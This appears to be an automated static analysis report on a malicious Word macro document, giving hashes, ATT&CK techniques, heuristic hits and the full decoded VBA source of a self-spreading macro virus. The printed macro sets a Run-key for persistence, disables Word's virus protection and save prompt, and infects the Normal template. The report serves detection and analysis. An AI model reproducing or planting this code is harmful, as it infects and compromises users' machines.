Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd018b0004541af6…

MALICIOUS

Office (OLE)

33.0 KB Created: 1999-07-20 22:52:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 2fe10b14aaad0993cd3dfff905a5f282 SHA-1: 9058d366958ba407431e0b3fed6ec3d7c1f31ba6 SHA-256: fd018b0004541af62e2449f25f7e3eb6576adcb4500194af60d4ee69a8c5f72a
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The Document_Open macro executes a series of commands to establish persistence and create malicious files. It writes a registry key 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kobold' pointing to 'C:\WINDOWS\SYSTEM\kobold.vbs', and then creates two temporary files, 'C:\WINDOWS\SYSTEM\Kobold.tmp' and 'C:\WINDOWS\SYSTEM\Kobold.sys', which appear to be part of a multi-stage payload execution. The script uses WScript.CreateObject to interact with Word and manipulate its VBA project.

Heuristics 4

  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Open "C:\WINDOWS\SYSTEM\kobold.vbs" For Output As #1
    Print #1, "Set Kobold = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "Kobold.Options.VirusProtection = (Rnd*0)"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Kobold") = "C:\WINDOWS\SYSTEM\kobold.vbs"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1471 bytes
SHA-256: 7662164301b304fd09fe73aead84dfe5231bcee027a14f71cb80ef1e78637c54
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Kobold") = "C:\WINDOWS\SYSTEM\kobold.vbs"
ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Kobold.tmp")
Open "C:\WINDOWS\SYSTEM\kobold.vbs" For Output As #1
Print #1, "Set Kobold = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Kobold.Options.VirusProtection = (Rnd*0)"
Print #1, "Kobold.Options.SaveNormalPrompt = (Rnd*0)"
Print #1, "Kobold.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Kobold.sys" & Chr(34) & ")"
Print #1, "Kobold.Application.Quit"
Close #1
Open "C:\WINDOWS\SYSTEM\Kobold.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Kobold.tmp" & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = 1 To 4"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
Close #1
ActiveDocument.Save
End Sub